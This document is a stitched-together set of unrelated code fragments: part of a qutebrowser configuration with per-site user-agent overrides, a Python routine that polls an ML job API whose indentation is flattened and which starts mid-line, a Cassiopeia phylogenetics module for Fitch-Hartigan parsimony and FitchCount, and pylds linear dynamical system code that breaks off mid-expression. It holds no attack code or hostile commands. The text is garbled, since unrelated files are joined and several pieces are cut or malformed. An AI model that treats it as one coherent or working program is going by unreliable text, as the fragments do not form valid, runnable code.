# describing an encoding such as _utf-8_, _iso-8859-1_, etc.
# Type: String
c.content.default_encoding = 'utf-8'
# Allow websites to share screen content.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.desktop_capture = 'ask'
# Value to send in the `Accept-Language` header. Note that the value
# read from JavaScript is always the global value.
# Type: String
c.content.headers.accept_language = 'en-GB,en'
# Custom headers for qutebrowser HTTP requests.
# Type: Dict
c.content.headers.custom = {}
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://docs.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://drive.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version}', 'https://web.whatsapp.com/')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version} Edg/{upstream_browser_version}', 'https://accounts.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99 Safari/537.36', 'https://*.slack.com/*')
# Load images automatically in web pages.
# Type: Bool
config.set('content.images', True, 'chrome-devtools://*')
# | |
= ""
job_status = "unknown"
as_json = True
record = {}
if as_json:
record = json.loads(get_response.text)
job_status = str(record["job"]["status"]).strip().lstrip().lower()
# end of as_json
if job_status == "requested":
if last_status != job_status:
lg("Job=" + str(job_id) + " is requested - Step: 0/10", 5)
if use_progres_widget:
progress.value = 0
elif job_status == "initial":
if last_status != job_status:
lg("Job=" + str(job_id) + " is initial - Step 1/10", 5)
if use_progres_widget:
progress.value = 1
elif job_status == "active":
if last_status != job_status:
lg("Job=" + str(job_id) + " is active - Step 2/10", 5)
if use_progres_widget:
progress.value = 2
elif job_status == "training":
if last_status != job_status:
lg("Job=" + str(job_id) + " is training - Step 3/10", 5)
if use_progres_widget:
progress.value = 3
elif job_status == "predicting":
if last_status != job_status:
lg("Job=" + str(job_id) + " is predicting - Step 4/10", 5)
if use_progres_widget:
progress.value = 4
elif job_status == "analyzing":
if last_status != job_status:
lg("Job=" + str(job_id) + " is analyzing - Step 5/10", 5)
if use_progres_widget:
progress.value = 5
elif job_status == "caching":
if last_status != job_status:
lg("Job=" + str(job_id) + " is caching - Step 6/10", 5)
if use_progres_widget:
progress.value = 6
elif job_status == "plotting":
if last_status != job_status:
lg("Job=" + str(job_id) + " is plotting - Step 7/10", 5)
if use_progres_widget:
progress.value = 7
elif job_status == "emailing":
if last_status != job_status:
lg("Job=" + str(job_id) + " is emailing - Step 8/10", 5)
if use_progres_widget:
progress.value = 8
elif job_status == "uploading":
if last_status != job_status:
lg("Job=" + str(job_id) + " is uploading - Step 9/10", 5)
if use_progres_widget:
progress.value = 9
elif job_status == "archiving":
if last_status != job_status:
lg("Job=" + str(job_id) + " is archiving - Step 10/10", 5)
if use_progres_widget:
progress.value = 10
elif job_status == "completed":
if use_progres_widget:
progress.value = 10
progress.bar_style = 'success'
not_done = False
lg("Job=" + str(job_id) + " completed", 5)
end_time = datetime.datetime.now()
prefix_label = "Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " after waiting " + str((end_time - start_time).total_seconds())[0:5] + "s"
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status)
if use_progres_widget:
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
elif job_status == "cancelled":
if use_progres_widget:
progress.bar_style = 'danger'
not_done = False
lg("Job=" + str(job_id) + " cancelled", 5)
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
elif job_status == "error":
if use_progres_widget:
progress.bar_style = 'danger'
not_done = False
lg("Job=" + str(job_id) + " error", 5)
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
else:
if use_progres_widget:
progress.bar_style = 'danger'
not_done = False
lg("Job=" + str(job_id) + " in unexpected status=" + str(job_status) + "", 0)
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Done waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
break
# end of if/else
last_status = job_status
# end of post for running an ML Job
end_time = datetime.datetime.now()
if use_progres_widget:
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Waiting on job=" + str(job_id) + " status=" + str(job_status) + " progress=" + str(progress.value) + "/" + str(total_steps)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
if not_done:
sleep(sleep_interval)
# end of while not_done
except Exception as w:
status = "Exception"
err_msg = "Failed waiting on job=" + str(job_id) + " with Ex=" + str(w)
lg(err_msg, 0)
end_time = datetime.datetime.now()
if use_progres_widget:
progress.bar_style = 'danger'
prefix_label = str((end_time - start_time).total_seconds())[0:5] + "s - Error waiting on job=" + str(job_id) + " status=" + str(status) + " progress=" + str(progress.value) + "/" + str(total_steps) + " hit Exception: " + str(w)
label.value = u'{name}: {index} / {size}'.format(
name=prefix_label,
index=progress.value,
size=total_steps
)
# end of try/ex
results = {
"status" : status,
"error" : err_msg,
"record" : record
}
return results
# end of wait_on_job
def wait_for_job_to_finish(job_id):
status = "Failed"
err_msg = ""
record = {}
results = {}
try:
query_params = {}
post_data = {}
resource_url = rt_url + "/ml/" + str(job_id) + "/"
lg("Waiting on job=" + str(job_id) + " url=" + str(resource_url), 5)
job_status = "active"
max_retries = 10
retry = 0
sleep_interval = 1.0
not_done = True
while not_done:
user_token = rest_login_as_user(rt_user, rt_pass, rt_url)
auth_headers = {
"Authorization" : "JWT " + str(user_token)
}
get_response = requests.get(resource_url, params=query_params, data=post_data, headers=auth_headers)
if get_response.status_code != 201 and get_response.status_code != 200:
err_msg = "Failed with GET Response Status=" + str(get_response.status_code) + " Reason=" + str(get_response.reason)
lg(err_msg, 0)
lg("Details:\n" + str(get_response.text) + "\n", 0)
status = "Failed"
retry += 1
if retry > max_retries:
not_done = False
lg("Failed to get job=" + str(job_id) + " status", 0)
break
else:
lg("Failed to get job=" + str(job_id) + " status retry=" + str(retry) + "/" + str(max_retries), 0)
# end of if/else
else:
lg("SUCCESS - GET Response Status=" + str(get_response.status_code) + " Reason=" + str(get_response.reason), 5)
retry = 0
status = "SUCCESS"
err_msg = ""
job_status = "unknown"
as_json = True
record = {}
if as_json:
record = json.loads(get_response.text)
job_status = str(record["job"]["status"]).strip().lstrip().lower()
# end of as_json
if job_status == "requested":
lg("Job=" + str(job_id) + " is requested - Step: 0/10", 5)
progress = 0
elif job_status == "initial":
lg("Job=" + str(job_id) + " is initial - Step 1/10", 5)
progress = 1
elif job_status == "active":
lg("Job=" + str(job_id) + " is active - Step 2/10", 5)
progress = 2
elif job_status == "training":
lg("Job=" + str(job_id) + " is training - Step 3/10", 5)
progress = 3
elif job_status == "predicting":
lg("Job=" + str(job_id) + " is predicting - Step 4/10", 5)
progress = 4
elif job_status == "analyzing":
lg("Job=" + str(job_id) + " is analyzing - Step 5/10", 5)
progress = 5
elif job_status == "caching":
lg("Job=" + str(job_id) + " is caching - Step 6/10", 5)
progress = 6
elif job_status == "plotting":
lg("Job=" + str(job_id) + " is plotting - Step 7/10", 5)
progress = 7
elif job_status == "emailing":
lg("Job=" + str(job_id) + " is emailing - Step 8/10", 5)
progress = 8
elif job_status == "uploading":
lg("Job=" + str(job_id) + " is uploading - Step 9/10", 5)
progress = 9
elif job_status == "archiving":
lg("Job=" + str(job_id) + " is archiving - Step 10/10", 5)
progress = 10
elif job_status == "completed":
progress = 10
not_done = False
lg("Job=" + str(job_id) + " completed", 5)
break
elif job_status == "cancelled":
not_done = False
lg("Job=" + str(job_id) + " cancelled", 5)
break
elif job_status == "error":
not_done = False
lg("Job=" + str(job_id) + " error", 5)
break
else:
not_done = False
lg("Job=" + str(job_id) + " completed", 5)
break
# end of if/else
# end of post for running an ML Job
if not_done:
sleep(sleep_interval)
# end of while not_done
except Exception as w:
status = "Exception"
err_msg = "Failed waiting for job=" + str(job_id) + " with Ex=" + str(w)
lg(err_msg, 0)
# end of try/ex
results = {
"status" : status,
"error" : err_msg,
"record" : record
}
return results
# end of wait_for_job_to_finish
def helper_get_job_analysis(job_id):
status = "Failed"
err_msg = ""
record = {}
results = {}
try:
query_params = {}
post_data = {}
resource_url = rt_url + "/ml/analysis/" | |
<reponame>YosefLab/SingleCellLineageTracing
"""
This file contains several tools useful for using small-parsimony to analyze
phylogenies.
Amongst these tools are basic Fitch-Hartigan reconstruction, parsimony scoring,
and the FitchCount algorithm described in Quinn, Jones et al, Science (2021).
"""
from typing import Dict, List, Optional
import itertools
import numpy as np
import pandas as pd
from pandas.api.types import is_categorical_dtype, is_numeric_dtype
from cassiopeia.data import CassiopeiaTree
from cassiopeia.mixins.errors import (
CassiopeiaError,
CassiopeiaTreeError,
FitchCountError,
)
def fitch_hartigan(
cassiopeia_tree: CassiopeiaTree,
meta_item: str,
root: Optional[str] = None,
state_key: str = "S1",
label_key: str = "label",
copy: bool = False,
) -> Optional[CassiopeiaTree]:
"""Run the Fitch-Hartigan algorithm.
Performs the full Fitch-Hartigan small parsimony algorithm which, given
a set of states for the leaves, infers the most-parsimonious set of states
and returns a random solution that satisfies the maximum-parsimony
criterion. The solution will be stored in the label key specified by the
user (by default 'label'). This function will modify the tree in place
if `copy=False`.
Args:
cassiopeia_tree: CassiopeiaTree that has been processed with the
Fitch-Hartigan bottom-up algorithm.
meta_item: A column in the CassiopeiaTree cell meta corresponding to a
categorical variable.
root: Root from which to begin this refinement. Only the subtree below
this node will be considered.
state_key: Attribute key that stores the Fitch-Hartigan ancestral
states.
label_key: Key to add that stores the maximum-parsimony assignment
inferred from the Fitch-Hartigan top-down refinement.
copy: Modify the tree in place or not.
Returns:
A new CassiopeiaTree if the copy is set to True, else None.
"""
cassiopeia_tree = cassiopeia_tree.copy() if copy else cassiopeia_tree
fitch_hartigan_bottom_up(cassiopeia_tree, meta_item, state_key)
fitch_hartigan_top_down(cassiopeia_tree, root, state_key, label_key)
return cassiopeia_tree if copy else None
def fitch_hartigan_bottom_up(
cassiopeia_tree: CassiopeiaTree,
meta_item: str,
add_key: str = "S1",
copy: bool = False,
) -> Optional[CassiopeiaTree]:
"""Performs Fitch-Hartigan bottom-up ancestral reconstruction.
Performs the bottom-up phase of the Fitch-Hartigan small parsimony
algorithm. A new attribute called "S1" will be added to each node
storing the optimal set of ancestral states inferred from this bottom-up
algorithm. If copy is False, the tree will be modified in place.
Args:
cassiopeia_tree: CassiopeiaTree object with cell meta data.
meta_item: A column in the CassiopeiaTree cell meta corresponding to a
categorical variable.
add_key: Key to add for bottom-up reconstruction
copy: Modify the tree in place or not.
Returns:
A new CassiopeiaTree if the copy is set to True, else None.
Raises:
CassiopeiaError if the tree does not have the specified meta data
or the meta data is not categorical.
"""
if meta_item not in cassiopeia_tree.cell_meta.columns:
raise CassiopeiaError("Meta item does not exist in the cassiopeia tree")
meta = cassiopeia_tree.cell_meta[meta_item]
if is_numeric_dtype(meta):
raise CassiopeiaError("Meta item is not a categorical variable.")
if not is_categorical_dtype(meta):
meta = meta.astype("category")
cassiopeia_tree = cassiopeia_tree.copy() if copy else cassiopeia_tree
for node in cassiopeia_tree.depth_first_traverse_nodes():
if cassiopeia_tree.is_leaf(node):
cassiopeia_tree.set_attribute(node, add_key, [meta.loc[node]])
else:
children = cassiopeia_tree.children(node)
if len(children) == 1:
child_assignment = cassiopeia_tree.get_attribute(
children[0], add_key
)
cassiopeia_tree.set_attribute(node, add_key, [child_assignment])
all_labels = np.concatenate(
[
cassiopeia_tree.get_attribute(child, add_key)
for child in children
]
)
states, frequencies = np.unique(all_labels, return_counts=True)
S1 = states[np.where(frequencies == np.max(frequencies))]
cassiopeia_tree.set_attribute(node, add_key, S1)
return cassiopeia_tree if copy else None
def fitch_hartigan_top_down(
cassiopeia_tree: CassiopeiaTree,
root: Optional[str] = None,
state_key: str = "S1",
label_key: str = "label",
copy: bool = False,
) -> Optional[CassiopeiaTree]:
"""Run Fitch-Hartigan top-down refinement
Runs the Fitch-Hartigan top-down algorithm which selects an optimal solution
from the tree rooted at the specified root.
Args:
cassiopeia_tree: CassiopeiaTree that has been processed with the
Fitch-Hartigan bottom-up algorithm.
root: Root from which to begin this refinement. Only the subtree below
this node will be considered.
state_key: Attribute key that stores the Fitch-Hartigan ancestral
states.
label_key: Key to add that stores the maximum-parsimony assignment
inferred from the Fitch-Hartigan top-down refinement.
copy: Modify the tree in place or not.
Returns:
A new CassiopeiaTree if the copy is set to True, else None.
Raises:
A CassiopeiaTreeError if Fitch-Hartigan bottom-up has not been called
or if the state_key does not exist for a node.
"""
# assign root
root = cassiopeia_tree.root if (root is None) else root
cassiopeia_tree = cassiopeia_tree.copy() if copy else cassiopeia_tree
for node in cassiopeia_tree.depth_first_traverse_nodes(
source=root, postorder=False
):
if node == root:
root_states = cassiopeia_tree.get_attribute(root, state_key)
cassiopeia_tree.set_attribute(
root, label_key, np.random.choice(root_states)
)
continue
parent = cassiopeia_tree.parent(node)
parent_label = cassiopeia_tree.get_attribute(parent, label_key)
optimal_node_states = cassiopeia_tree.get_attribute(node, state_key)
if parent_label in optimal_node_states:
cassiopeia_tree.set_attribute(node, label_key, parent_label)
else:
cassiopeia_tree.set_attribute(
node, label_key, np.random.choice(optimal_node_states)
)
return cassiopeia_tree if copy else None
def score_small_parsimony(
cassiopeia_tree: CassiopeiaTree,
meta_item: str,
root: Optional[str] = None,
infer_ancestral_states: bool = True,
label_key: Optional[str] = "label",
) -> int:
"""Computes the small-parsimony of the tree.
Using the meta data stored in the specified cell meta column, compute the
parsimony score of the tree.
Args:
cassiopeia_tree: CassiopeiaTree object with cell meta data.
meta_item: A column in the CassiopeiaTree cell meta corresponding to a
categorical variable.
root: Node to treat as the root. Only the subtree below
this node will be considered.
infer_ancestral_states: Whether or not ancestral states must be inferred
(this will be False if `fitch_hartigan` has already been called on
the tree.)
label_key: If ancestral states have already been inferred, this key
indicates the name of the attribute they're stored in.
Returns:
The parsimony score.
Raises:
CassiopeiaError if label_key has not been populated.
"""
cassiopeia_tree = cassiopeia_tree.copy()
if infer_ancestral_states:
fitch_hartigan(cassiopeia_tree, meta_item, root, label_key=label_key)
parsimony = 0
for (parent, child) in cassiopeia_tree.depth_first_traverse_edges(
source=root
):
try:
if cassiopeia_tree.get_attribute(
parent, label_key
) != cassiopeia_tree.get_attribute(child, label_key):
parsimony += 1
except CassiopeiaTreeError:
raise CassiopeiaError(
f"{label_key} does not exist for a node, "
"try running Fitch-Hartigan or passing "
"infer_ancestral_states=True."
)
return parsimony
def fitch_count(
cassiopeia_tree: CassiopeiaTree,
meta_item: str,
root: Optional[str] = None,
infer_ancestral_states: bool = True,
state_key: str = "S1",
unique_states: Optional[List[str]] = None,
):
"""Runs the FitchCount algorithm.
Performs the FitchCount algorithm for inferring the number of times that
two states transition to one another across all equally-parsimonious
solutions returned by the Fitch-Hartigan algorithm. The original algorithm
was described in <NAME>, et al, Science (2021). The output is an
MxM count matrix, where the values indicate the number of times that
m1 transitioned to m2 along an edge in a Fitch-Hartigan solution.
To obtain probabilities P(m1 -> m2), divide each row by its row-sum.
This procedure will only work on categorical data and will otherwise raise
an error.
Args:
cassiopeia_tree: CassiopeiaTree object with a tree and cell meta data.
meta_item: A column in the CassiopeiaTree cell meta corresponding to a
categorical variable.
root: Node to treat as the root. Only the subtree below this node will
be considered for the procedure.
infer_ancestral_states: Whether or not to initialize the ancestral state
sets with Fitch-Hartigan.
state_key: If ancestral state sets have already been created, then this
argument specifies what the attribute name is in the CassiopeiaTree
unique_states: State space that can be optionally provided by the user.
If this is not provided, we take the unique values in
`cell_meta[meta_item]` to be the state space.
Returns:
An MxM count matrix indicating the number of edges that contained a
transition between two states across all equally parsimonious
solutions returned by Fitch-Hartigan.
"""
cassiopeia_tree = cassiopeia_tree.copy()
if unique_states is None:
unique_states = cassiopeia_tree.cell_meta[meta_item].unique()
else:
if (
len(
np.setdiff1d(
cassiopeia_tree.cell_meta[meta_item].unique(), unique_states
)
)
> 0
):
raise FitchCountError(
"Specified state space does not span the set"
" of states that appear in the meta data."
)
if root != cassiopeia_tree.root:
cassiopeia_tree.subset_clade(root)
if infer_ancestral_states:
fitch_hartigan_bottom_up(cassiopeia_tree, meta_item, add_key=state_key)
# create mapping from nodes to integers
bfs_postorder = [cassiopeia_tree.root]
for (_, e1) in cassiopeia_tree.breadth_first_traverse_edges():
bfs_postorder.append(e1)
node_to_i = dict(zip(bfs_postorder, range(len(bfs_postorder))))
label_to_j = dict(zip(unique_states, range(len(unique_states))))
N = _N_fitch_count(
cassiopeia_tree, unique_states, node_to_i, label_to_j, state_key
)
C = _C_fitch_count(
cassiopeia_tree, N, unique_states, node_to_i, label_to_j, state_key
)
M = pd.DataFrame(np.zeros((N.shape[1], N.shape[1])))
M.columns = unique_states
M.index = unique_states
# create count matrix
for s1 in unique_states:
for s2 in unique_states:
M.loc[s1, s2] = np.sum(
C[
node_to_i[cassiopeia_tree.root],
:,
label_to_j[s1],
label_to_j[s2],
]
)
return M
def _N_fitch_count(
cassiopeia_tree: CassiopeiaTree,
unique_states: List[str],
node_to_i: Dict[str, int],
label_to_j: Dict[str, int],
state_key: str = "S1",
) -> np.array(int):
"""Fill in the dynamic programming table N for FitchCount.
| |
from __future__ import division
from warnings import warn
import numpy as np
from scipy.sparse import csr_matrix
from pybasicbayes.util.general import objarray
from pylds.lds_messages_interface import info_E_step, info_sample, kalman_info_filter, kalman_filter, E_step
# TODO on instantiating, maybe gaussian states should be resampled
# TODO make niter an __init__ arg instead of a method arg
###########
# bases #
###########
class _LDSStates(object):
def __init__(self, model, T=None, data=None, inputs=None, stateseq=None,
initialize_from_prior=False,
initialize_to_noise=True):
self.model = model
self.T = T if T is not None else data.shape[0]
self.data = data
self.inputs = np.zeros((self.T, 0)) if inputs is None else inputs
self._normalizer = None
if stateseq is not None:
self.gaussian_states = stateseq
elif initialize_from_prior:
self.generate_states()
elif initialize_to_noise:
self.gaussian_states = np.random.normal(size=(self.T, self.D_latent))
elif data is not None:
self.resample()
else:
raise Exception("Invalid options. Must specify how states are initialized.")
### Basics
def log_likelihood(self):
if self._normalizer is None:
self._normalizer, _, _ = kalman_info_filter(*self.info_params)
# self._normalizer += self._info_extra_loglike_terms(
# *self.extra_info_params,
# isdiag=self.diagonal_noise)
return self._normalizer
def generate_states(self):
# Generate from the prior and raise exception if unstable
T, n = self.T, self.D_latent
gss = np.empty((T,n),dtype='double')
gss[0] = np.random.multivariate_normal(self.mu_init, self.sigma_init)
for t in range(1,T):
gss[t] = self.dynamics_distn.\
rvs(x=np.hstack((gss[t-1][None,:], self.inputs[t-1][None,:])),
return_xy=False)
assert np.all(np.isfinite(gss[t])), "LDS appears to be unstable!"
self.gaussian_states = gss
def generate_obs(self):
# Go through each time bin, get the discrete latent state,
# use that to index into the emission_distns to get samples
T, p = self.T, self.D_emission
ed = self.emission_distn
gss = self.gaussian_states
data = np.empty((T,p),dtype='double')
for t in range(self.T):
data[t] = \
ed.rvs(x=np.hstack((gss[t][None, :], self.inputs[t][None,:])),
return_xy=False)
return data
def sample_predictions(self, Tpred, inputs=None, states_noise=False, obs_noise=False):
inputs = np.zeros((Tpred, self.D_input)) if inputs is None else inputs
_, filtered_mus, filtered_sigmas = kalman_filter(
self.mu_init, self.sigma_init,
self.A, self.B, self.sigma_states,
self.C, self.D, self.sigma_obs,
self.inputs, self.data)
init_mu = self.A.dot(filtered_mus[-1]) + self.B.dot(self.inputs[-1])
init_sigma = self.sigma_states + self.A.dot(
filtered_sigmas[-1]).dot(self.A.T)
randseq = np.zeros((Tpred - 1, self.D_latent))
if states_noise:
L = np.linalg.cholesky(self.sigma_states)
randseq += np.random.randn(Tpred - 1, self.D_latent).dot(L.T)
states = np.empty((Tpred, self.D_latent))
if states_noise:
states[0] = np.random.multivariate_normal(init_mu, init_sigma)
else:
states[0] = init_mu
for t in range(1, Tpred):
states[t] = self.A.dot(states[t - 1]) + \
self.B.dot(inputs[t - 1]) + \
randseq[t - 1]
obs = states.dot(self.C.T) + inputs.dot(self.D.T)
if obs_noise:
L = np.linalg.cholesky(self.sigma_obs)
obs += np.random.randn(Tpred, self.D_emission).dot(L.T)
return obs
## convenience properties
@property
def D_latent(self):
return self.dynamics_distn.D_out
@property
def D_input(self):
return self.dynamics_distn.D_in - self.dynamics_distn.D_out
@property
def D_emission(self):
return self.emission_distn.D_out
@property
def dynamics_distn(self):
return self.model.dynamics_distn
@property
def emission_distn(self):
return self.model.emission_distn
@property
def diagonal_noise(self):
return self.model.diagonal_noise
@property
def mu_init(self):
return self.model.mu_init
@property
def sigma_init(self):
return self.model.sigma_init
@property
def A(self):
return self.dynamics_distn.A[:, :self.D_latent]
@property
def B(self):
return self.dynamics_distn.A[:, self.D_latent:]
@property
def sigma_states(self):
return self.dynamics_distn.sigma
@property
def C(self):
return self.emission_distn.A[:,:self.D_latent]
@property
def D(self):
return self.emission_distn.A[:, self.D_latent:]
@property
def sigma_obs(self):
return self.emission_distn.sigma
@property
def _kwargs(self):
return dict(super(_LDSStates, self)._kwargs,
gaussian_states=self.gaussian_states)
@property
def info_init_params(self):
J_init = np.linalg.inv(self.sigma_init)
h_init = np.linalg.solve(self.sigma_init, self.mu_init)
log_Z_init = -1. / 2 * h_init.dot(np.linalg.solve(J_init, h_init))
log_Z_init += 1. / 2 * np.linalg.slogdet(J_init)[1]
log_Z_init -= self.D_latent / 2. * np.log(2 * np.pi)
return J_init, h_init, log_Z_init
@property
def info_dynamics_params(self):
A = self.A
B = self.B
Q = self.sigma_states
# Get the pairwise potentials
# TODO: Check for diagonal before inverting
J_pair_22 = np.linalg.inv(Q)
J_pair_21 = -J_pair_22.dot(A)
J_pair_11 = A.T.dot(-J_pair_21)
# Check if diagonal and avoid inverting D_obs x D_obs matrix
mBTQiA = B.T.dot(J_pair_21)
BTQi = B.T.dot(J_pair_22)
h_pair_1 = self.inputs[:-1].dot(mBTQiA)
h_pair_2 = self.inputs[:-1].dot(BTQi)
log_Z_pair = -1. / 2 * np.linalg.slogdet(Q)[1]
log_Z_pair -= self.D_latent / 2. * np.log(2 * np.pi)
hJh_pair = B.T.dot(np.linalg.solve(Q, B))
log_Z_pair -= 1. / 2 * np.einsum('ij,ti,tj->t', hJh_pair, self.inputs[:-1], self.inputs[:-1])
return J_pair_11, J_pair_21, J_pair_22, h_pair_1, h_pair_2, log_Z_pair
@property
def info_emission_params(self):
C = self.C
centered_data = self.data - self.inputs.dot(self.D.T)
# Observations
log_Z_node = -self.D_emission / 2. * np.log(2 * np.pi) * np.ones(self.T)
if self.diagonal_noise:
# Use the fact that the diagonal regression prior is factorized
rsq = self.emission_distn.sigmasq_flat
RinvC = (1/rsq)[:,None] * C
J_node = C.T.dot(RinvC)
h_node = centered_data.dot(RinvC)
log_Z_node -= 1./2 * np.sum(np.log(rsq))
log_Z_node -= 1./2 * np.sum(centered_data**2 * 1./rsq, axis=1)
else:
Rinv = np.linalg.inv(self.sigma_obs)
RinvC = Rinv.dot(C)
J_node = C.T.dot(RinvC)
h_node = centered_data.dot(RinvC)
log_Z_node += 1./2 * np.linalg.slogdet(Rinv)[1]
log_Z_node -= 1./2 * np.einsum('ij,ti,tj->t', Rinv,
centered_data, centered_data)
return J_node, h_node, log_Z_node
@property
def info_params(self):
return self.info_init_params + self.info_dynamics_params + self.info_emission_params
def info_filter(self):
self._normalizer, filtered_Js, filtered_hs = \
kalman_info_filter(*self.info_params)
return filtered_Js, filtered_hs
def kalman_filter(self):
self._normalizer, filtered_mus, filtered_sigmas = kalman_filter(
self.mu_init, self.sigma_init,
self.A, self.B, self.sigma_states,
self.C, self.D, self.sigma_obs,
self.inputs, self.data)
# Update the normalization constant
# self._gaussian_normalizer += self._info_extra_loglike_terms(
# *self.extra_info_params,
# isdiag=self.diagonal_noise)
return filtered_mus, filtered_sigmas
def smooth(self):
# Use the info E step because it can take advantage of diagonal noise
# The standard E step could but we have not implemented it
self.info_E_step()
return self.smoothed_mus.dot(self.C.T) + self.inputs.dot(self.D.T)
### Expectations
def E_step(self):
return self.info_E_step()
def std_E_step(self):
self._normalizer, self.smoothed_mus, self.smoothed_sigmas, \
E_xtp1_xtT = E_step(
self.mu_init, self.sigma_init,
self.A, self.B, self.sigma_states,
self.C, self.D, self.sigma_obs,
self.inputs, self.data)
self._set_expected_stats(
self.smoothed_mus, self.smoothed_sigmas, E_xtp1_xtT)
def info_E_step(self):
self._normalizer, self.smoothed_mus, \
self.smoothed_sigmas, E_xtp1_xtT = \
info_E_step(*self.info_params)
self._set_expected_stats(
self.smoothed_mus, self.smoothed_sigmas, E_xtp1_xtT)
def _set_expected_stats(self, smoothed_mus, smoothed_sigmas, E_xtp1_xtT):
# Get the emission stats
p, n, d, T, inputs, data = \
self.D_emission, self.D_latent, self.D_input, self.T, \
self.inputs, self.data
E_x_xT = smoothed_sigmas + self.smoothed_mus[:, :, None] * self.smoothed_mus[:, None, :]
E_x_uT = smoothed_mus[:, :, None] * self.inputs[:, None, :]
E_u_uT = self.inputs[:, :, None] * self.inputs[:, None, :]
E_xu_xuT = np.concatenate((
np.concatenate((E_x_xT, E_x_uT), axis=2),
